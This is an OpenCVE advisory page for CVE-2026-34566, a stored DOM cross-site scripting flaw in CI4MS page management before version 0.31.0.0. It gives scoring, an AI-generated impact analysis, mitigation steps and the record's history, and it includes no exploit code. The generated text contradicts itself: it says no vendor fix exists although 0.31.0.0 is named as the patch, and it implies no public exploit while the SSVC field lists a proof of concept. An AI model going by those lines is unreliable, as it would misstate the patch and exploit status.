Description
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Published: 2026-04-01
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Stored DOM XSS capable of full account takeover and privilege escalation
Action: Immediate Patch
AI Analysis

Impact

CI4MS is a CodeIgniter 4 based CMS skeleton that uses page management functionality. Prior to release 0.31.0.0 the application fails to properly sanitize user input in multiple fields that are stored server‑side. These values are later rendered without output encoding, allowing an attacker to embed and persist malicious JavaScript that runs in the context of an administrator or any visitor to a public page. The resulting stored DOM‑based XSS can lead to full account takeover, privilege escalation, or theft of session cookies, as classified by CWE‑79.

Affected Systems

The vulnerability affects all CI4MS installations running versions older than 0.31.0.0 from the vendor ci4‑cms‑erp. The official fix has been applied in release 0.31.0.0, which removes the unsanitized input store and applies proper output encoding. No other versions are documented, so any earlier release is considered vulnerable.

Risk and Exploitability

The CVSS score of 9.1 indicates a high severity attack that could compromise confidentiality, integrity, and availability of the CMS account. The EPSS score of under 1 % suggests low current exploit probability, and the issue is not listed in CISA KEV, implying no known public exploits. The likely attack vector is remote web‑based input through the page editing interface, where an attacker with permissions to create or edit pages can inject payloads. Successful exploitation would give access to administrative functionality and allow further privilege escalation.

Generated by OpenCVE AI on April 6, 2026 at 19:47 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade CI4MS to version 0.31.0.0 or later
  • If an upgrade is not immediately feasible, restrict the use of the Page Management feature to a limited set of trusted administrators and monitor for unauthorized input
  • If possible, implement server‑side output encoding for all page content or remove scripting content from inputs
  • Apply a site‑wide Content Security Policy that disallows inline scripts

Generated by OpenCVE AI on April 6, 2026 at 19:47 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-458r-h248-29c5 CI4MS: Pages Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
History

Mon, 06 Apr 2026 16:45:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*

Sat, 04 Apr 2026 05:00:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 02 Apr 2026 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Ci4-cms-erp
Ci4-cms-erp ci4ms
Vendors & Products Ci4-cms-erp
Ci4-cms-erp ci4ms

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Title CI4MS: Pages Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L'}

Subscriptions

Ci4-cms-erp Ci4ms
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-04T03:15:36.218Z

Reserved: 2026-03-30T16:56:30.997Z

Link: CVE-2026-34566

cve-icon Vulnrichment

Updated: 2026-04-04T03:15:30.419Z

cve-icon NVD

Status : Analyzed

Published: 2026-04-01T22:16:20.263

Modified: 2026-04-06T16:42:22.200

Link: CVE-2026-34566

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-07T07:56:33Z

Weaknesses